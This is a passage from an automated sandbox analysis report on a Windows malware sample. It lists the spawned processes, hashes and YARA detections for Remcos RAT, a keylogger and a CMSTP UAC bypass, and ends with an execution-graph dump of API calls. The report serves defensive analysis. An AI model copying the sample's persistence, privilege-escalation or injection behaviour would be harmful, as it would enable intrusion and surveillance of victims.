                                        Commandline:C:\Users\user\AppData\Roaming/AUGUST.exe
                                        Imagebase:0x400000
                                        File size:4'809'996 bytes
                                        MD5 hash:25860926414BF43383246F7C773A8D6C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000010.00000003.2318798588.00000000027E3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        Antivirus matches:
                                        • Detection: 3%, ReversingLabs
                                        Has exited:true

                                        Target ID:17
                                        Start time:12:40:33
                                        Start date:25/09/2024
                                        Path:C:\Users\user\DZIPR.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\DZIPR.exe"
                                        Imagebase:0x400000
                                        File size:8'767'704 bytes
                                        MD5 hash:EC9CE1D67F98072281015C7726FBA245
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000011.00000000.2322852163.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\DZIPR.exe, Author: Joe Security
                                        Antivirus matches:
                                        • Detection: 0%, ReversingLabs
                                        Has exited:true

                                        Target ID:18
                                        Start time:12:40:34
                                        Start date:25/09/2024
                                        Path:C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                                        Imagebase:0x400000
                                        File size:8'767'704 bytes
                                        MD5 hash:EC9CE1D67F98072281015C7726FBA245
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe, Author: Joe Security
                                        Antivirus matches:
                                        • Detection: 0%, ReversingLabs
                                        Has exited:true

                                        Target ID:19
                                        Start time:12:40:35
                                        Start date:25/09/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\cmd.exe
                                        Imagebase:0x1c0000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                        Has exited:true

                                        Target ID:20
                                        Start time:12:40:35
                                        Start date:25/09/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:21
                                        Start time:12:40:44
                                        Start date:25/09/2024
                                        Path:C:\Windows\System32\svchost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                        Imagebase:0x7ff7403e0000
                                        File size:55'320 bytes
                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:23
                                        Start time:12:40:53
                                        Start date:25/09/2024
                                        Path:C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                                        Imagebase:0x400000
                                        File size:8'767'704 bytes
                                        MD5 hash:EC9CE1D67F98072281015C7726FBA245
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:24
                                        Start time:12:40:53
                                        Start date:25/09/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\cmd.exe
                                        Imagebase:0x1c0000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                        Has exited:true

                                        Target ID:25
                                        Start time:12:40:53
                                        Start date:25/09/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:26
                                        Start time:12:41:01
                                        Start date:25/09/2024
                                        Path:C:\Windows\SysWOW64\explorer.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\explorer.exe
                                        Imagebase:0x810000
                                        File size:4'514'184 bytes
                                        MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Has exited:true

                                        Target ID:27
                                        Start time:12:41:11
                                        Start date:25/09/2024
                                        Path:C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe"
                                        Imagebase:0x400000
                                        File size:8'767'704 bytes
                                        MD5 hash:EC9CE1D67F98072281015C7726FBA245
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:28
                                        Start time:12:41:11
                                        Start date:25/09/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\cmd.exe
                                        Imagebase:0x1c0000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Has exited:true

                                        Target ID:29
                                        Start time:12:41:11
                                        Start date:25/09/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:30
                                        Start time:12:41:11
                                        Start date:25/09/2024
                                        Path:C:\Windows\SysWOW64\explorer.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\explorer.exe
                                        Imagebase:0x810000
                                        File size:4'514'184 bytes
                                        MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001E.00000002.2757772777.0000000000459000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001E.00000002.2757772777.0000000000459000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001E.00000002.2757772777.0000000000459000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001E.00000002.2757772777.0000000000459000.00000002.00000001.01000000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Has exited:true

                                        Target ID:31
                                        Start time:12:41:29
                                        Start date:25/09/2024
                                        Path:C:\Windows\SysWOW64\explorer.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\explorer.exe
                                        Imagebase:0x810000
                                        File size:4'514'184 bytes
                                        MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001F.00000002.2928479107.0000000000459000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001F.00000002.2928479107.0000000000459000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001F.00000002.2928479107.0000000000459000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001F.00000002.2928479107.0000000000459000.00000002.00000001.01000000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Has exited:true

                                          Execution Graph

                                          Execution Coverage:17.7%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:25.9%
                                          Total number of Nodes:1474
                                          Total number of Limit Nodes:20
9182->9658 9184->9180 9185->9083 9187->9182 9189 405910 ??3@YAXPAX 9189->9182 9190 401411 2 API calls 9190->9222 9192->9176 9193 405bd8 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9213 405bf3 9193->9213 9194 405a9f GetKeyState 9194->9222 9195 405c6c 9197 405ca2 9195->9197 9198 405c74 9195->9198 9196 40243b lstrcmpW 9196->9222 9201 4012f7 2 API calls 9197->9201 9721 403f85 9198->9721 9202 405cb0 9201->9202 9205 403b59 15 API calls 9202->9205 9209 405cb9 9205->9209 9206 407776 55 API calls 9210 405c13 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9206->9210 9207 401362 2 API calls 9211 405c91 ??3@YAXPAX 9207->9211 9208->9083 9212 405cca ??3@YAXPAX 9209->9212 9216 401362 2 API calls 9209->9216 9210->9213 9217 405cd9 9211->9217 9212->9217 9213->9206 9214 405c4a ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9213->9214 9214->9213 9215 405bcd ??3@YAXPAX 9215->9222 9216->9212 9219 405d24 9217->9219 9220 405d16 9217->9220 9218 401329 ??2@YAPAXI ??3@YAXPAX 9218->9222 9734 40786b 9219->9734 9507 404a44 9220->9507 9222->9190 9222->9193 9222->9194 9222->9195 9222->9196 9222->9213 9222->9214 9222->9215 9222->9218 9224 401429 ??2@YAPAXI ??3@YAXPAX 9222->9224 9706 407613 9222->9706 9715 407674 9222->9715 9224->9222 9225 405d20 9226 405d65 9225->9226 9740 403e0d 9225->9740 9227 404034 21 API calls 9226->9227 9229 405d77 9227->9229 9231 401411 2 API calls 9229->9231 9232 406373 9229->9232 9233 405d95 9231->9233 9234 4063f7 ctype 9232->9234 9237 40243b lstrcmpW 9232->9237 9277 405da8 9233->9277 9744 40453e 9233->9744 9236 40643a ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9234->9236 9242 40243b lstrcmpW 9234->9242 9239 406461 9236->9239 9240 406467 ??3@YAXPAX 9236->9240 9238 4063a4 9237->9238 9238->9234 9761 403f48 9238->9761 9239->9240 9241 403e70 ctype 4 API calls 9240->9241 9243 406478 ??3@YAXPAX ??3@YAXPAX 9241->9243 9245 406416 9242->9245 9243->9045 9244 401411 ??2@YAPAXI ??3@YAXPAX 9244->9277 9245->9236 9249 406423 9245->9249 9248 405dd8 9252 405de5 9248->9252 9253 4061fa ??3@YAXPAX 
??3@YAXPAX 9248->9253 9250 4012f7 2 API calls 9249->9250 9255 406432 9250->9255 9251 4073d1 21 API calls 9256 4063e0 ??3@YAXPAX 9251->9256 9753 4043c6 9252->9753 9257 406312 9253->9257 9254 40243b lstrcmpW 9254->9277 9766 404aff 9255->9766 9256->9234 9260 40636a ??3@YAXPAX 9257->9260 9263 404034 21 API calls 9257->9263 9259 405e45 9265 401329 2 API calls 9259->9265 9260->9232 9268 406321 9263->9268 9269 405e4e 9265->9269 9266 4043c6 2 API calls 9267 405e0e 9266->9267 9270 401362 2 API calls 9267->9270 9533 4048ab 9268->9533 9274 403b7f 19 API calls 9269->9274 9275 405e1a ??3@YAXPAX ??3@YAXPAX GetFileAttributesW 9270->9275 9272 40626b ??3@YAXPAX ??3@YAXPAX 9272->9257 9273 401329 2 API calls 9273->9277 9290 405e57 9274->9290 9278 406211 9275->9278 9279 405e41 9275->9279 9276 40633a SetCurrentDirectoryW 9280 4048ab 4 API calls 9276->9280 9277->9244 9277->9248 9277->9254 9277->9259 9277->9272 9277->9273 9281 401429 2 API calls 9277->9281 9284 403e0d 16 API calls 9278->9284 9279->9259 9282 406362 9280->9282 9283 405ee5 ??3@YAXPAX ??3@YAXPAX 9281->9283 9285 403e0d 16 API calls 9282->9285 9283->9277 9286 406216 9284->9286 9285->9260 9287 407776 55 API calls 9286->9287 9288 40621f 7 API calls 9287->9288 9289 40625e 9288->9289 9289->9272 9291 405f61 _wtol 9290->9291 9292 403bce lstrlenW lstrlenW _wcsnicmp 9290->9292 9293 406025 9290->9293 9291->9290 9292->9290 9294 406080 9293->9294 9295 40602e 9293->9295 9296 401362 2 API calls 9294->9296 9297 406053 9295->9297 9298 406034 9295->9298 9299 40607e 9296->9299 9301 401329 2 API calls 9297->9301 9300 401329 2 API calls 9298->9300 9302 40254d 2 API calls 9299->9302 9303 40603f 9300->9303 9304 406051 9301->9304 9305 406092 9302->9305 9306 40254d 2 API calls 9303->9306 9307 40243b lstrcmpW 9304->9307 9308 401411 2 API calls 9305->9308 9309 406048 9306->9309 9310 406068 9307->9310 9311 40609a 9308->9311 9312 40254d 2 API calls 9309->9312 9310->9305 9314 40254d 2 API calls 9310->9314 9313 401411 2 API calls 9311->9313 9312->9304 
9315 4060a2 memset 9313->9315 9314->9299 9316 4060e1 9315->9316 9317 404594 2 API calls 9316->9317 9318 4060fe 9317->9318 9319 401329 2 API calls 9318->9319 9320 406109 9319->9320 9321 403b7f 19 API calls 9320->9321 9322 406112 9321->9322 9323 4061b1 9322->9323 9527 4021ed 9322->9527 9325 4062ee ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9323->9325 9327 4061c5 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9323->9327 9325->9257 9327->9253 9328 406150 9330 403b7f 19 API calls 9328->9330 9329 401429 2 API calls 9331 406147 9329->9331 9332 406168 ShellExecuteExW 9330->9332 9334 40254d 2 API calls 9331->9334 9335 406282 9332->9335 9336 40618c 9332->9336 9334->9328 9339 407776 55 API calls 9335->9339 9337 4061a0 CloseHandle 9336->9337 9338 406192 WaitForSingleObject 9336->9338 9758 402185 9337->9758 9338->9337 9341 40628c 9339->9341 9342 403e0d 16 API calls 9341->9342 9343 406291 9 API calls 9342->9343 9344 4062e1 9343->9344 9344->9325 9346 401b6c SetTimer GetMessageW DispatchMessageW KillTimer KiUserCallbackDispatcher 9345->9346 9347 401b9f GetVersionExW 9345->9347 9346->9347 9347->9043 9347->9044 9349 40112b 2 API calls 9348->9349 9350 403e38 GetCommandLineW 9349->9350 9351 404594 9350->9351 9352 4045ce 9351->9352 9355 4045a2 9351->9355 9354 401429 2 API calls 9352->9354 9356 4045c6 9352->9356 9353 401429 2 API calls 9353->9355 9354->9352 9355->9353 9355->9356 9356->9055 9358 401411 2 API calls 9357->9358 9364 402a79 9358->9364 9359 401362 2 API calls 9360 402b6c ??3@YAXPAX 9359->9360 9360->9058 9361 402b5f 9361->9359 9363 401411 2 API calls 9363->9364 9364->9361 9364->9363 9365 401429 ??2@YAPAXI ??3@YAXPAX 9364->9365 9367 401362 2 API calls 9364->9367 9805 4025c6 9364->9805 9808 40272e 9364->9808 9365->9364 9368 402ad9 ??3@YAXPAX 9367->9368 9369 4013e2 2 API calls 9368->9369 9370 402aee ??3@YAXPAX ??3@YAXPAX 9369->9370 9370->9364 9372 403d80 9371->9372 9373 403dbd 9372->9373 9374 403d9a lstrlenW lstrlenW 9372->9374 9373->9061 9373->9063 9819 401a85 9374->9819 9377 
401f47 3 API calls 9376->9377 9378 404416 9377->9378 9379 401f9d 19 API calls 9378->9379 9380 40441d 9379->9380 9381 401f9d 19 API calls 9380->9381 9382 404429 9381->9382 9383 401f9d 19 API calls 9382->9383 9384 404435 9383->9384 9385 401f9d 19 API calls 9384->9385 9386 404441 9385->9386 9387 401f9d 19 API calls 9386->9387 9388 40444d 9387->9388 9389 401f9d 19 API calls 9388->9389 9390 404459 9389->9390 9391 401f9d 19 API calls 9390->9391 9392 404465 9391->9392 9393 404480 SHGetSpecialFolderPathW 9392->9393 9396 404533 #17 9392->9396 9397 401411 2 API calls 9392->9397 9398 401329 ??2@YAPAXI ??3@YAXPAX 9392->9398 9400 402f6c 7 API calls 9392->9400 9824 402425 ??3@YAXPAX ??3@YAXPAX 9392->9824 9393->9392 9394 40449a wsprintfW 9393->9394 9395 401411 2 API calls 9394->9395 9395->9392 9396->9064 9397->9392 9398->9392 9400->9392 9402 4022b0 2 API calls 9401->9402 9403 4025c2 9402->9403 9403->9107 9825 403e86 9404->9825 9406 404e56 9407 403e86 2 API calls 9406->9407 9408 404e65 9407->9408 9829 404343 9408->9829 9412 404e82 ??3@YAXPAX 9413 404343 3 API calls 9412->9413 9414 404e9d 9413->9414 9415 403ec1 2 API calls 9414->9415 9416 404ea8 ??3@YAXPAX wsprintfA 9415->9416 9845 403ef6 9416->9845 9418 404ed0 9419 403ef6 2 API calls 9418->9419 9420 404edb 9419->9420 9421 402844 9420->9421 9422 402851 9421->9422 9430 40dcfb 3 API calls 9422->9430 9423 402863 lstrlenA lstrlenA 9428 402890 9423->9428 9424 40296e 9424->9119 9424->9120 9425 40293b memmove 9425->9424 9425->9428 9426 4028db memcmp 9426->9424 9426->9428 9427 402918 memcmp 9427->9428 9428->9424 9428->9425 9428->9426 9428->9427 9431 40dcc7 GetLastError 9428->9431 9856 402640 9428->9856 9430->9423 9431->9428 9433 40243b lstrcmpW 9432->9433 9434 40461c 9433->9434 9435 40466c 9434->9435 9437 401329 2 API calls 9434->9437 9436 40243b lstrcmpW 9435->9436 9438 40468a 9436->9438 9439 404633 9437->9439 9442 40243b lstrcmpW 9438->9442 9440 401f9d 19 API calls 9439->9440 9441 40463a 9440->9441 9444 40254d 2 API calls 9441->9444 9443 
4046a2 9442->9443 9446 40243b lstrcmpW 9443->9446 9445 404643 9444->9445 9447 401329 2 API calls 9445->9447 9448 4046ba 9446->9448 9449 40465c 9447->9449 9451 40243b lstrcmpW 9448->9451 9450 401f9d 19 API calls 9449->9450 9452 404663 9450->9452 9453 4046d2 9451->9453 9454 40254d 2 API calls 9452->9454 9455 4046e9 9453->9455 9456 4046d9 lstrcmpiW 9453->9456 9454->9435 9457 40243b lstrcmpW 9455->9457 9456->9455 9458 4046ff 9457->9458 9459 40243b lstrcmpW 9458->9459 9460 40472c 9459->9460 9461 404739 9460->9461 9859 403d1f 9460->9859 9463 40243b lstrcmpW 9461->9463 9467 40474d 9463->9467 9464 40476d 9465 40243b lstrcmpW 9464->9465 9472 404780 9465->9472 9467->9464 9468 40243b lstrcmpW 9467->9468 9863 403cc6 9467->9863 9468->9467 9469 4047a0 9471 40243b lstrcmpW 9469->9471 9473 4047ac 9471->9473 9472->9469 9474 40243b lstrcmpW 9472->9474 9867 403cf7 9472->9867 9475 40243b lstrcmpW 9473->9475 9474->9472 9476 4047bd 9475->9476 9477 40243b lstrcmpW 9476->9477 9478 4047ce 9477->9478 9479 4047e4 9478->9479 9480 4047db _wtol 9478->9480 9481 40243b lstrcmpW 9479->9481 9480->9479 9482 4047f0 9481->9482 9483 404800 9482->9483 9484 4047f7 _wtol 9482->9484 9485 40243b lstrcmpW 9483->9485 9484->9483 9486 40480c 9485->9486 9487 40243b lstrcmpW 9486->9487 9488 404824 9487->9488 9489 40243b lstrcmpW 9488->9489 9490 40483c 9489->9490 9490->9176 9875 4023dd 9491->9875 9495 404045 9494->9495 9496 404088 9494->9496 9497 4012f7 2 API calls 9495->9497 9498 403b7f 19 API calls 9495->9498 9496->9159 9496->9160 9497->9495 9499 404062 SetEnvironmentVariableW ??3@YAXPAX 9498->9499 9499->9495 9499->9496 9501 40393b 7 API calls 9500->9501 9502 403b69 9501->9502 9503 4039f6 7 API calls 9502->9503 9504 403b74 9503->9504 9505 4027c7 6 API calls 9504->9505 9506 403b7a 9505->9506 9506->9180 9662 4083b6 9506->9662 9879 408676 9507->9879 9509 404a55 ??2@YAPAXI 9510 404a64 9509->9510 9524 40dcfb 3 API calls 9510->9524 9511 404a85 9881 40b2fc 9511->9881 9887 40a7de _EH_prolog 9511->9887 9512 404a95 9513 
404ab3 9512->9513 9514 404a99 9512->9514 9516 404ada ??2@YAPAXI 9513->9516 9519 403354 86 API calls 9513->9519 9515 407776 55 API calls 9514->9515 9523 404aa1 9515->9523 9517 404ae6 9516->9517 9518 404aed 9516->9518 9922 404292 9517->9922 9903 40150b 9518->9903 9521 404ac6 9519->9521 9521->9516 9521->9523 9523->9225 9524->9511 9528 402200 LoadLibraryA GetProcAddress 9527->9528 9529 4021fb 9527->9529 9530 40221b 9528->9530 9531 402223 9528->9531 9529->9323 9529->9328 9529->9329 9530->9529 9531->9530 10385 4021b9 LoadLibraryA GetProcAddress 9531->10385 9534 401411 2 API calls 9533->9534 9541 4048bc 9534->9541 9535 401329 2 API calls 9535->9541 9536 40494e 9537 404988 ??3@YAXPAX 9536->9537 9539 4048ab 3 API calls 9536->9539 9537->9276 9538 401429 2 API calls 9538->9541 9540 404985 9539->9540 9540->9537 9541->9535 9541->9536 9541->9538 9542 40243b lstrcmpW 9541->9542 9542->9541 9544 40661a 2 API calls 9543->9544 9545 4049af 9544->9545 9546 401f9d 19 API calls 9545->9546 9547 4049bd 9546->9547 9548 4024fc 2 API calls 9547->9548 9549 4049c7 9548->9549 9550 4049fd 9549->9550 9552 40254d ??2@YAPAXI ??3@YAXPAX 9549->9552 9551 40254d 2 API calls 9550->9551 9553 404a0a 9551->9553 9552->9549 9554 401f9d 19 API calls 9553->9554 9555 404a11 9554->9555 9556 40254d 2 API calls 9555->9556 9557 404a1b 9556->9557 9558 4073d1 21 API calls 9557->9558 9559 404a30 ??3@YAXPAX 9558->9559 9560 404a41 ctype 9559->9560 9560->9083 9562 40e8da ctype 3 API calls 9561->9562 9563 403e7e 9562->9563 9564 40e8da ctype 3 API calls 9563->9564 9565 40e943 ??3@YAXPAX 9564->9565 9565->9077 9567 40db53 2 API calls 9566->9567 9568 404ce8 9567->9568 9569 404d44 9568->9569 9571 4024fc 2 API calls 9568->9571 9570 4025ae 2 API calls 9569->9570 9572 404d4c 9570->9572 9573 404cf7 9571->9573 9574 403e86 2 API calls 9572->9574 9577 404db5 ??3@YAXPAX 9573->9577 9579 403354 86 API calls 9573->9579 9575 404d59 9574->9575 9576 403ef6 2 API calls 9575->9576 9578 404d66 9576->9578 9591 404db1 9577->9591 9580 403ef6 2 API 
calls 9578->9580 9581 404d1b 9579->9581 9582 404d73 9580->9582 9581->9577 9584 40db53 2 API calls 9581->9584 9583 403ef6 2 API calls 9582->9583 9585 404d80 9583->9585 9586 404d37 9584->9586 9587 40dd5f 2 API calls 9585->9587 9586->9577 9588 404d3b ??3@YAXPAX 9586->9588 9589 404d94 9587->9589 9588->9569 9589->9577 9590 404d9d ??3@YAXPAX 9589->9590 9590->9591 9591->9142 9593 4025ae 2 API calls 9592->9593 9609 4030a8 9593->9609 9594 403301 9595 403344 ??3@YAXPAX 9594->9595 9596 40334e 9595->9596 9596->9128 9596->9135 9597 401411 ??2@YAPAXI ??3@YAXPAX 9597->9609 9599 40272e ??2@YAPAXI ??3@YAXPAX MultiByteToWideChar 9599->9609 9600 401362 2 API calls 9601 4030f3 ??3@YAXPAX ??3@YAXPAX 9600->9601 9602 403303 9601->9602 9601->9609 10393 4029c3 9602->10393 9606 40331c ??3@YAXPAX 9606->9596 9607 4031e5 strncmp 9608 4031d0 strncmp 9607->9608 9607->9609 9608->9607 9608->9609 9609->9594 9609->9597 9609->9599 9609->9600 9609->9602 9609->9607 9610 401362 2 API calls 9609->9610 9611 402640 2 API calls 9609->9611 9614 402640 ??2@YAPAXI ??3@YAXPAX 9609->9614 9616 4023dd lstrcmpW 9609->9616 9617 402f6c 7 API calls 9609->9617 9619 403330 9609->9619 9620 4032b2 lstrcmpW 9609->9620 9624 401329 2 API calls 9609->9624 10387 402986 9609->10387 10392 402425 ??3@YAXPAX ??3@YAXPAX 9609->10392 9612 403252 ??3@YAXPAX 9610->9612 